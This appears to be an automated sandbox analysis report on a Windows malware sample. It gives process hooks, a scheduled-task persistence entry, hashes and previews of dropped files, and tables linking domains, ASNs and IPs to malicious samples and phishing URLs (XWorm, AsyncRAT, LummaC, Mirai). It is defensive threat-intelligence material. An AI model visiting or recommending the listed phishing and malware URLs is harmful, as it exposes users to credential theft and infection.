05:20:27 | API Interceptor | 4362x Sleep call for process: svchost.exe modified
07:03:12 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
07:03:22 | API Interceptor | 418105x Sleep call for process: winlogon.exe modified
07:03:23 | API Interceptor | 335270x Sleep call for process: lsass.exe modified
07:03:25 | API Interceptor | 1728x Sleep call for process: wzcsvc.exe modified
07:03:28 | API Interceptor | 393510x Sleep call for process: dwm.exe modified
11:20:25 | Task Scheduler  | Run new task: wzcsapi path: %Current%\wzcsapi.exe
Match (domain) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
windowsupdatebg.s.llnwi.net | Request for Quotation MK FMHS.RFQ.10.24.vbs | malicious | GuLoader, Snake Keylogger | 87.248.204.0
 | Request for Quotation MK FMHS.RFQ.10.24.vbs | malicious | Unknown | 178.79.238.128
 | https://jobs.sap.com/job/Walldorf-SAP-Ariba-Technology-Consultant-EMEA-ISBN-Technology-Services-%28Location-Germany%29-69190/1110452901/ | malicious | Unknown | 87.248.204.0
 | SecuriteInfo.com.W32.PossibleThreat.20383.9039.exe | malicious | Unknown | 46.228.146.0
 | file.exe | malicious | CobaltStrike | 87.248.205.0
 | https://saaxzz2569.cyou/m/user/index | malicious | Unknown | 87.248.204.0
 | https://qrco.de/bfTkZ4 | malicious | Unknown | 178.79.208.1
 | https://bt-custom3r-serv1ce.weeblysite.com/ | malicious | Unknown | 87.248.204.0
 | https://798-ads.pages.dev/ | malicious | HTMLPhisher | 178.79.208.1
 | https://urless.com/XMVIg | malicious | Unknown | 178.79.238.128
i.ibb.co | https://pub-c5538851da6244d790b9ba2a84c8b2af.r2.dev/index.html | malicious | HTMLPhisher | 162.19.58.161
 | http://nmacouai-80bf.edohlriapdnoap.workers.dev | malicious | HTMLPhisher | 162.19.58.157
 | 432mtXKD3l.exe | malicious | XWorm | 162.19.58.156
 | http://netflix-n-chill.vercel.app/ | malicious | HTMLPhisher | 162.19.58.157
 | https://rondoc-b7ce.lvauayt.workers.dev/ | malicious | HTMLPhisher | 162.19.58.160
 | https://meaoee-fc3f.elamzioehr.workers.dev/ | malicious | HTMLPhisher | 162.19.58.157
 | https://oaemk-f29f.hmnaitswiaa.workers.dev/ | malicious | HTMLPhisher | 104.194.8.184
 | http://sanjaygowda23.github.io/netflix-homepage | malicious | HTMLPhisher | 104.194.8.184
 | http://pub-0b94d4f0b06646c5bbfca320d917c04a.r2.dev/insured.html | malicious | HTMLPhisher | 169.197.85.95
 | https://soulis-alex.github.io/netflix/ | malicious | HTMLPhisher | 162.19.58.156
rentry.co | Q1KaSJ8Fom.exe | malicious | Unknown | 172.67.75.40
 | hzUKkzHBqd.ps1 | malicious | Unknown | 104.26.2.16
 | MVgsmZoDvQ.exe | malicious | AsyncRAT, DcRat | 172.67.75.40
 | hQI2tssFc0.exe | malicious | Unknown | 104.26.2.16
 | Q1KaSJ8Fom.exe | malicious | Unknown | 104.26.2.16
 | cs.exe | malicious | Python Stealer, CStealer | 172.67.75.40
 | R6IuO0fzec.exe | malicious | Python Stealer, CStealer | 104.26.3.16
 | FluxusV2.exe | malicious | Python Stealer, CStealer | 104.26.3.16
 | egFMhHSlmf.exe | malicious | Xmrig | 104.26.3.16
 | x2Yi9Hr77a.exe | malicious | XWorm | 172.67.75.40
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
PUREVOLTAGE-INCUS | https://ducati-mlbb.shop/ | malicious | HTMLPhisher | 162.249.168.129
 | https://dlce.cc/fbacdcb212bcbb323077d5a99ef04c07 | malicious | Unknown | 104.244.159.148
 | https://dlce.cc/fbacdcb212bcbb323077d5a99ef04c07 | malicious | Unknown | 104.244.159.148
 | https://email.mail.dlce.cc/c/eJxMkLGu2zAMAL_G2mRQNC1Kg4Yu-Y2AIqVGqGMbiVEgf18E6PDWwy13cp73YSVRDhYW8CxonpTJZ4rdQ9UYrUIyTM5KFJUUXSuBMVHOKaF7FCSt2iWzJIldM2sUaYtGUuMY1I2CgBQAckhrQJwXaMl6YrPQE1OYCJ4yttk2bbOq28rjus73tPya8Dbh7T-f8NarqGnFgFVrXXABZlsl59aBFNjtxzX6ULnGsX_LslFvHbJfexZPvaGXwOwRgXo1Ya7szk0-7fXVrcUaU1g8AKknhOqTZvWAUcHSWiOxe5Wx92MiqPI55fWnj_dj7L9nPZ7u3Xa7X-P541Fwfwv-CwAA__-Ag2la | malicious | Unknown | 104.244.159.148
 | https://meaoee-fc3f.elamzioehr.workers.dev/ | malicious | HTMLPhisher | 169.197.85.95
 | https://oaemk-f29f.hmnaitswiaa.workers.dev/ | malicious | HTMLPhisher | 169.197.85.95
 | http://pub-0b94d4f0b06646c5bbfca320d917c04a.r2.dev/insured.html | malicious | HTMLPhisher | 169.197.85.95
 | https://jumatan.sudaha.biz.id/4F741t%23XjCw%5BYg/ | malicious | Unknown | 162.249.168.129
 | https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfg | malicious | GRQ Scam | 162.249.168.129
 | https://en-io-trezor-docs.github.io/ | malicious | HTMLPhisher | 169.197.85.95
CLOUDFLARENETUS | Q1KaSJ8Fom.exe | malicious | Unknown | 162.159.135.232
 | hzUKkzHBqd.ps1 | malicious | Unknown | 104.26.2.16
 | MVgsmZoDvQ.exe | malicious | AsyncRAT, DcRat | 172.67.75.40
 | hQI2tssFc0.exe | malicious | Unknown | 104.26.2.16
 | Q1KaSJ8Fom.exe | malicious | Unknown | 104.16.184.241
 | lfyJfb6jSS.exe | malicious | LummaC | 188.114.97.3
 | http://learnthelanguage.nl/?wptouch_switch=desktop&redirect=http://basinindustriesinc.com | malicious | HTMLPhisher | 104.17.25.14
 | http://translate.how | malicious | Unknown | 188.114.96.3
 | http://learnthelanguage.nl/?wptouch_switch=desktop&redirect=http://basinindustriesinc.com | malicious | HTMLPhisher | 104.17.25.14
 | SecuriteInfo.com.Win32.PWSX-gen.19951.1573.exe | malicious | LummaC | 172.67.141.93
SALSGIVERUS | SpeedHack666Cheat (no VM detected).exe | malicious | Njrat, RevengeRAT | 147.185.221.23
 | mIURiU8n2P.exe | malicious | XWorm | 147.185.221.21
 | 8svMXMXNRn.exe | malicious | NoCry, XWorm | 147.185.221.23
 | 7yJsmmW4wS.exe | malicious | XWorm | 147.185.221.23
 | I8YtUAUWeS.exe | malicious | XWorm | 147.185.221.23
 | s3OBQLA3xR.exe | malicious | XWorm | 147.185.221.23
                                                                                                                                                                                                                                            W1FREE.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.23
                                                                                                                                                                                                                                            dHp58IIEYz.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.22
                                                                                                                                                                                                                                            Lr87y2w72r.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.18
                                                                                                                                                                                                                                            7LwVrYH7sy.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 147.185.221.18
                                                                                                                                                                                                                                            CENTURYLINK-US-LEGACY-QWESTUSna.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                            • 174.124.122.209
                                                                                                                                                                                                                                            na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                            • 216.9.192.166
                                                                                                                                                                                                                                            na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                            • 75.171.124.182
                                                                                                                                                                                                                                            na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                            • 69.68.76.227
                                                                                                                                                                                                                                            na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                                                                                                            • 65.149.196.1
                                                                                                                                                                                                                                            4Y8rbNhkaR.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                            • 75.168.189.227
                                                                                                                                                                                                                                            na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                            • 67.237.29.87
                                                                                                                                                                                                                                            na.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                            • 138.15.49.36
                                                                                                                                                                                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 63.231.92.27
                                                                                                                                                                                                                                            na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 63.231.92.27
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Q1KaSJ8Fom.exe | malicious | Unknown | 162.19.58.157, 104.26.2.16, 169.197.85.95
hzUKkzHBqd.ps1 | malicious | Unknown | 162.19.58.157, 104.26.2.16, 169.197.85.95
hQI2tssFc0.exe | malicious | Unknown | 162.19.58.157, 104.26.2.16, 169.197.85.95
Q1KaSJ8Fom.exe | malicious | Unknown | 162.19.58.157, 104.26.2.16, 169.197.85.95
xc.exe | malicious | AsyncRAT, XWorm | 162.19.58.157, 104.26.2.16, 169.197.85.95
qz.exe | malicious | Quasar | 162.19.58.157, 104.26.2.16, 169.197.85.95
_FA_2024-09-01_17031.PDF.html | malicious | Unknown | 162.19.58.157, 104.26.2.16, 169.197.85.95
captcha.cmd | malicious | Unknown | 162.19.58.157, 104.26.2.16, 169.197.85.95
oWARzPF1Ms.exe | malicious | PureLog Stealer | 162.19.58.157, 104.26.2.16, 169.197.85.95
0CX5vBE7nr.exe | malicious | Babadeda, KDOT TOKEN GRABBER | 162.19.58.157, 104.26.2.16, 169.197.85.95
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: C:\Users\user\Desktop\wzcsvc.exe
wzcstatus.exe | malicious | Unknown
Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.2591948169420386
Encrypted: false
SSDEEP: 192:p3hzcdz5n0XCDVaWJ3OCHUeZFTanlnazuiFvZ24lO8Ou:phzkzaXCDVa29RcazuiFvY4lO8n
MD5: 4E854B8EA6AD33A23ACB27E1797F7C20
SHA1: 66BAD66313A5B0B49B34A2554172C94354EAD8B2
SHA-256: F746D957DB4D69CED08FBB4860C19E857D1136F19B8DA4D3C212F53C645C6F64
SHA-512: 17B1DD382C31A70A862141B3203E56CBCE813322C90D33FA59AD0D6F8FF3001F20EA824F4AEDDCD8B5FD3E6FE8AD03823213CB470C549530B860B627F7957914
Malicious: true
                                                                                                                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.4.5.7.6.2.1.8.3.0.4.0.3.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.4.5.7.6.2.2.4.5.5.3.9.8.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.4.4.5.b.a.2.-.7.2.a.9.-.4.3.b.f.-.b.1.a.3.-.4.3.1.8.1.b.6.b.e.2.c.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.7.8.6.3.8.a.4.-.5.e.f.2.-.4.0.5.7.-.b.6.7.a.-.e.b.1.6.0.e.1.e.3.8.e.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.8.k.2.9.D.B.r.a.E...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.B.y.p.a.s.s.U.A.C...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.8.0.-.0.0.0.1.-.0.0.1.4.-.b.f.1.d.-.6.2.7.3.e.3.1.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.d.e.7.6.1.4.2.9.7.a.4.6.2.0.3.2.a.2.c.a.9.a.2.8.4.5.a.2.3.a.9.0.0.0.0.0.0.0.0.!.0.0.0.0.2.9.f.4.4.2.9.9.3.9.e.5.7.6.6.6.b.8.a.5.7.c.2.d.7.b.9.5.a.4.8.0.1.f.a.7.c.a.2.0.!.r.8.k.2.9.D.B.r.a.E.
Process: C:\Windows\System32\WerFault.exe
File Type: Mini DuMP crash report, 16 streams, Tue Oct 15 09:20:22 2024, 0x1205a4 type
Category: dropped
Size (bytes): 452219
Entropy (8bit): 3.513357610370291
Encrypted: false
SSDEEP: 3072:jAf9GkLLILyRIFQC1CCqjTyBmr6vUPk5yzUb6c23+vMz2XPy4D+oUbJf8dqcSamB:c1GkLcI6qj623QMz2XK/oOJ0dia9u
MD5: BCA302679F17F5FAC2E66278A242980F
SHA1: 6F6AB592E2356DA2BAD1A5263C7C46E6BF0C2EAC
SHA-256: 45C2212DDE398F8CB269475B91A1522082467831684D7BA961C253CC6D492C24
SHA-512: 0DDCBE0AB83CABE3E476F0E8DB826920821751D85D85637FCB141FE34869D3B916255571612FEDD0A06EEEC0BE74651C244D961FAD056336ADF51694D6F6311A
Malicious: false
                                                                                                                                                                                                                                              Preview:MDMP..a..... ........3.g............................4.......$....(..........((......D...(x..........l.......8...........T............8..............D2..........04..............................................................................eJ.......4......Lw......................T............3.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8606
Entropy (8bit): 3.6977634071093393
Encrypted: false
SSDEEP: 192:R6l7wVeJG1ZC/A6YNZd/fWgmfZZdprr89bIszdf0s4m:R6lXJcZCY6Yz9fWgmfHsIIdfv
MD5: C17862692858CBF66CEB5C5C4B6FA0B5
SHA1: AD5AE46825BE2B786069C2D78861A4E448899E02
SHA-256: 98180CA43F3F5BB700BC5565840435E18A139BE698A8328946B17AEC596F8F10
SHA-512: AC5CB5E2EC1BA39EE72AB3D847DC713295AB90F16B3A8997CC310CBBA3F8F200E04DA1913CD6D7081C45C627FE7D8B9113F63C91CB3D36FF664B6BC68F802369
Malicious: false
                                                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.4.0.8.<./.P.i.
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4800
                                                                                                                                                                                                                                              Entropy (8bit):4.473972843202252
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsSwJg771I9gzWpW8VY/Ym8M4JUy2F/yq8vKy1L5r+Fd:uIjf1I7zC7VvJmW5L5r+Fd
                                                                                                                                                                                                                                              MD5:494EBB7856071022C690A2732D405820
                                                                                                                                                                                                                                              SHA1:040DE1BAE458F92BDBEE2681C411360C18478727
                                                                                                                                                                                                                                              SHA-256:CDAB97965F8944B3F2015C98447750334F3DC1CA9C2D2506D0069880D6370E7D
                                                                                                                                                                                                                                              SHA-512:710DF770D89C2F58AE39E39D23534C6CBCB120C0CC0F6261D2DF0D395FAA7AF34F2DAE0C85C8DD61CA484D144CDACBF118D28F855898678979F8B478F12A18FB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="544343" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):79586
                                                                                                                                                                                                                                              Entropy (8bit):3.043014628278272
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:O5rSEZ3yxXjxkAO1oXhHkXuqwMZbJa4bjiyT7fQYMOisU4z:O5rSEZ3yxXjxkAO1oXhHkXuqwMZbJa4D
                                                                                                                                                                                                                                              MD5:CD4ECE4507099D9D6FF67CDA556AFC7C
                                                                                                                                                                                                                                              SHA1:D5524F3725039208080DF56DEDC2FFE6E2B2FC0E
                                                                                                                                                                                                                                              SHA-256:07525F195C52A5AD2A96B5B2BDEC36CD505DE5EE76C01ADA18C6B06BD5A98A47
                                                                                                                                                                                                                                              SHA-512:AB1DEC7EF152016C5DCDD1AED86E91E9B1DC6503602691903A588F757BF492ACC6E4D2E62200DF7AD159CAB463F7BCB0145357B24CDEAC30C4F6BB84C9CC49E0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):13340
                                                                                                                                                                                                                                              Entropy (8bit):2.6850547241904876
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:TiZYWgSVf+CIEYPYhWaTH2UYEZe0tEiQk2hSCwjqHPaNZv6dMDnFIAw3:2ZDPpo16kPaNZwMDnaAw3
                                                                                                                                                                                                                                              MD5:F4A9C87C4894A4F38E0BB58C0559D34B
                                                                                                                                                                                                                                              SHA1:9CA197B6CA3D17C7DCD5906877A115FFF952F06B
                                                                                                                                                                                                                                              SHA-256:08BD6B140B20BF83F9C18837D1F41635010E18C2C0F787A4F22D529205E6AB36
                                                                                                                                                                                                                                              SHA-512:57D0976F08131F5530AFD510B65475F85D71837B77BA03C8F3B10B454239671089FCC4C25ED7D5A477DA0C22FFB1F9D5867C052DE079DAD178BEAE6A11E66D1A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4770
                                                                                                                                                                                                                                              Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                              MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                              SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                              SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                              SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 7796 bytes, 1 file, at 0x2c +A "pinrules.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):7796
                                                                                                                                                                                                                                              Entropy (8bit):7.971943145771426
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:CPTIWKvNnUBBBL05O/b0evl2G6AXK+KMlYX82:CbevNUBDLlz0eN2dAXlKH
                                                                                                                                                                                                                                              MD5:FB60E1AFE48764E6BF78719C07813D32
                                                                                                                                                                                                                                              SHA1:A1DC74EF8495C9A1489DD937659B5C2875027E16
                                                                                                                                                                                                                                              SHA-256:EBF3E7290B8FD1E5509CAA69335251F22B61BAF3F9FF87B4E8544F3C1FEA279D
                                                                                                                                                                                                                                              SHA-512:92BAA53445EC1A6EC049AF875783619D255AB4A46241B456BD87AE0043C117740BD117406E2CF5440840C68D0C573CBA7B40F58587CE7796D254D0B06E9B7973
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):302
                                                                                                                                                                                                                                              Entropy (8bit):3.8110300700394646
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:kK/NxSwfsJhN+SkQlPlEGYRMY9z+s3Ql2DUe/:/7kPlE99SCQl2DUe/
                                                                                                                                                                                                                                              MD5:AB61BC675E520E260B10588D2BFC0DBD
                                                                                                                                                                                                                                              SHA1:A89A4B126BD06738EB1C9C3DC766A067B6AB72E3
                                                                                                                                                                                                                                              SHA-256:18EE09D2AFB14E49A17EFF4C8B640B2BEBB4F5C4398A2D9605A86DD132E83708
                                                                                                                                                                                                                                              SHA-512:7D07B0FA6AC8EF67C64C362679976D99ACB78AA7F05A6B2E9B986C9BB7EEB44A8D3929A36CC0607D4C597869125621801BED92038826E8F8C6702F6DCD1D3110
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:p...... ........<P=y....(...............<P=y....<..i...<...X...........<..i... .........p.........................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):290
                                                                                                                                                                                                                                              Entropy (8bit):3.825820525451351
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:kKysRoWdMb+XFVDjYEs8uSUN+SkQlPlEGYRMY9z+4D1QuflIe/:3Mb+XjUEXkPlE99Si1QyIe/
                                                                                                                                                                                                                                              MD5:9A74601A7D7AE27D4C970BE78F811EF0
                                                                                                                                                                                                                                              SHA1:4745EA698203A82F6C6BCFEA4D8A1280C64EF36A
                                                                                                                                                                                                                                              SHA-256:3DEA9C703D4E289B0D05A6F439A3F97929A6391A43F1282600173352C062BF2B
                                                                                                                                                                                                                                              SHA-512:C6636151B101A052A63EBCCD596D91B6FFD3271E4EFB96F15D0A44D76ECCFE7345E0F8702D72C827BAEC08C6CE0F380D34E37526CD9604BE29F63C7F1C18C2DC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:p...... ..........5.....(........................u..i.....v.X............u..i... ........B@!....................t...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.p.i.n.r.u.l.e.s.s.t.l...c.a.b...
                                                                                                                                                                                                                                              Process:C:\Windows\System32\lsass.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):11152
                                                                                                                                                                                                                                              Entropy (8bit):7.972796460501386
